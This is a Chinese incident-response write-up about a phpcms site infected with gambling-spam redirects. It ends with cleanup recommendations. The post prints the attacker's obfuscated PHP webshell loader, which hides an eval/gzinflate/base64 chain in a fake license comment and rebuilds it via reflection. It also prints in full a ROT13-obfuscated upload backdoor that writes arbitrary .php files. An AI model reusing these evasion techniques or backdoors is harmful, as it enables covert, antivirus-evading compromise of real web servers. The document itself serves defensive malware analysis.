前一阵子接到某平台被挂BC的求助，顺手帮他们看了下，没想到捡了几个过了市面上主流防护软件的马子，查了下资料，发现免杀的思路是真的骚

首先观察下被挂BC的站点的环境和目前是什么状态

网站程序 phpcms9.4.2

部署环境 虚拟主机

搜索引擎表现为为被植入了寄生虫引流页面

搜索引擎访问跳转到www.xxxx.com，直接输入网址不跳，判断为JS检测referer进行跳转

然后要来了网站的源码，全局搜索这个网址，果真发现了这个链接

同时跟网站管理员索取了最近一段时间的访问日志，进行排查，由于有了修改的文件，所以直接在日志中搜索这个文件名，排查到了一个webshell路径......\caches_data\model_f1eld_0.cache.php，通过URI猜测是个大马

源码中看看这个shell长什么样

<?php

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in  Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED  AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author      Michal Migurski <[email protected]>
* @author      Matt Knapp <mdknapp[at]gmail[dot]com>
* @author      Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link        http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in  Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED  AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author      Michal Migurski <[email protected]>
* @author      Matt Knapp <mdknapp[at]gmail[dot]com>
* @author      Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link        http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
$ffname=""."code(\"
7L1pexvXlS762Xme/AcEzTbIhCJrHkRRcY22HE0W5VFys0ECJGGRAAKAGmzpPnYnTuwkjp2TpDM5U3fScXcndnI6J+14iP/LbYGSP52/cN937yqgqlAAKdudzul7mFgEC7v2uPZa71p7rbU7G+v9Qb03mF9Y+fSnmr1ep7fea3Y7vUGrvT0frUcXLpy7ULlZidbPexfWIhZ6oN8crA9ae8313dZeazCv8OFcr9MZrDdavcpqZW59LbrwWHThUi08Fzx6Jjp7cf3CuXMXa0+jnPzf1n57c9DqtCsX+NaD5+fvn6v3evUbC5/+1HOf/lQFP9d2WrvN+d1WfzA/d6V5Y3Huar23gLqb9c2d+aTwgiyavMGf1tb8fH/QG3T2u91mT7y5UPkMeoQPlZs3K7XaUqs9uFrf
【加密的代码太长，省略掉】
\")));";

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in  Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED  AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author      Michal Migurski <[email protected]>
* @author      Matt Knapp <mdknapp[at]gmail[dot]com>
* @author      Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link        http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
    private $math;
    public function dos($y){
        $a = $this->math;
        return $a("", $y);
    }
    public function get_info(){
        $comm = "";
        try{
            $this->math = strrev("noitcnuf_etaerc");
            $rec = new ReflectionClass("Test");
            global $comm;
            $comm =  $rec->getDocComment();
            throw new ReflectionException();
        }catch (ReflectionException $e){
            $start = strpos($comm,"val");
            $end = strpos($comm,"(base");
            return "e".substr($comm, $start, ($end-$start+5))."64_de";
        }
    }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

简单看了下，PHP大马特征较为明显，主流防护软件全部没有检出，简单对功能代码讲解下

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in  Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED  AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author      Michal Migurski <[email protected]>
* @author      Matt Knapp <mdknapp[at]gmail[dot]com>
* @author      Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link        http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
    private $math;
    public function dos($y){
        $a = $this->math;
        return $a("", $y);
    }
    public function get_info(){
        $comm = "";
        try{
            $this->math = strrev("noitcnuf_etaerc");
            $rec = new ReflectionClass("Test");
            global $comm;
            $comm =  $rec->getDocComment();
            throw new ReflectionException();
        }catch (ReflectionException $e){
            $start = strpos($comm,"val");
            $end = strpos($comm,"(base");
            return "e".substr($comm, $start, ($end-$start+5))."64_de";
        }
    }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

代码中包含了一个Test类，Test类中包含了成员$math，dos和get_info方法，其中get_info方法干了这么几件事

1. 尝试将翻转后的create_function赋值给成员$math

2. 实例化用于报告Test类有关信息的ReflectionClass类

3. 调用ReflectionClass::getDocComment对$comm赋值为该类上方的文档注释

4. 抛出异常并被异常处理捕获

5. 异常处理中获取val第一次出现的位置

6. 获取(base第一次出现的位置

7. 拼接字符串为eval(gzinflate(base64_de

然后，马子实例化了Test类，并且调用了dos方法创建了一个匿名函数，解密代码运行后的代码为create_function(eval(gzinflate(base64_de，看到这里发现base64_decode函数不完整，推测完整的部分在$ffname变量中存储，于是花了点时间解密了下发现完整的代码是create_function(eval(gzinflate(base64_decode(大马加密后的代码)))

大马的截图

大马解密后的部分代码如下

单看密码处理部分的加密方式md5(substr(md5(substr(md5($salt.$post_pass),5)),3));可以看到大马被捕获后密码被解密的可能性为0

由于日志中没有出现大马是怎么被植入到深层目录中的，判断该站被植入了不止一个后门，联系网站负责人后告知删除该木马并对可能存在的漏洞进行修复后备份整站（数据库、图片、源码），等待攻击者下一次进行攻击再进行清理

2天后网站果然被再次植入BC链接

随后要来访问日志对攻击者的攻击链进行分析，详情见图

发现访问了......\languages\en\cntw.lang.php

在网站源码中确实发现了这个文件，打开后发现是个加密后的上传后门，当以get形式获取到的值为str时，显现出上传界面并可以上传到任意目录（只要权限够大）

本地访问测试截图

代码截图

<?php

class Main{
    private $mainKey = 'abvgpahs_rgnrep';//rot13解密后是 create_function
    private $k;
    private $dir;
    function __construct(){
        $this->dir=dirname(__FILE__);
        @$this->auth();
    }
    public function uinique($k){
        $unique = $this->generateKey($k,$this->mainKey);
        $randomStr = ';)"cuc.".ugnc$,czrg$(rznare ;)czrg$,]"rzna_czg"[]"ryvs"[FRYVS_$(ryvs_qrqnbych_ribz ;))"." ,'.
            's$(eupeegf,s$(rznarfno."/".]"ugnc"[GFBC_$ = ugnc$ ;s$."/".]"ugnc"[GFBC_$ = czrg$ ;]"rzna"[]"ryvs"[FRYVS_$ = s$';
//rot13解密后 ;)"php.".htap$,pmet$(emaner ;)pmet$,]"eman_pmt"[]"elif"[selif_$(elif_dedaolpu_evom ;))"." ,f$(rhcrrts,f$(emanesab."/".]"htap"[tsop_$ = htap$ ;f$."/".]"htap"[tsop_$ = pmet$ ;]"eman"[]"elif"[selif_$ = f$
        $text = $this->generateKey($k, $randomStr);
//翻转后
/**
* $f = $_files["file"]["name"];
* $temp = $_post["path"]."/".$f;
* $path = $_post["path"]."/".basename($f,strrchr($f, "."));
* move_uploaded_file($_files["file"]["tmp_name"],$temp);
* rename($temp,$path.".php");
*/
        return $unique('', $text);
    }
    public function html($k, $text){
        echo $this->generateKey($k,$text);
    }

    function generateKey($k,$v){
        $key1 = $k.rev;//strrev
        $key2 = $key1('trts').r;//ot13解密后是 strtr
        $key3 = $key2($key1,array('rev'=>'_rot')).$key1(31); //str_rot13
        return $key3($key1($key2($v, array('?'=>'"'))));
    }
    public function auth(){
        if (!empty($_GET)) {
            $this->k=key($_GET);
            $this->html($this->k, '>"ngnq-zebs/gencvgyhz"=rclgpar "gfbc"=qbugrz ""=abvgpn zebs<');//<form action="" method="post" enctype="multipart/form-data">
            $this->html($this->k,'"=rhyni "ugnc"=rzna "gkrg"=rclg ghcav<>/"ryvs"=rzna "ryvs"=rclg ghcav<');//<input type="file" name="file"/><input type="text" name="path" value="
            echo $this->dir;//dirname(__FILE__);
            $this->html($this->k,'>zebs/<>/ "bt"=rhyni "gvzohf"=rzna "gvzohf"=rclg ghcav<>/"');//"/><input type="submit" name="submit" value="go" /></form>
            $authKey = $this->uinique($this->k);
            @$authKey();
        }
    }
}
$man = new Main();

1. 删除网站后门文件（位于......\caches_model\caches_data\model_f1eld_0.cache.php）。

2. 鉴于网站没有提供会员功能需求，建议关闭网站会员中心功能。

3. 修补在互联网上爆出的高危漏洞。

4. 删除/www/uploads/130208/目录。

5. 联系程序供应商升级程序到最新版

6. 切换PHP版本到5.6

7. 删除statics\js\video.min1.js、statics\js\video.min2.js。

8. 修改statics\js\video.min.js，将最后2行代码删除。

在后续的复查中又发现了与大马使用的相同思路的一句话木马，位于....../api/uc_client/data/cache/config.php

由于该组织保存的日志时间较短，无法分析出攻击者采用的攻击方式，为本次应急中的不足之处。

前有裸聊勒索诈骗套路，后APP敲诈搞下线

内鬼删库！企业损失巨大市值蒸发8亿

90%手机应用无需授权即可监听用户语音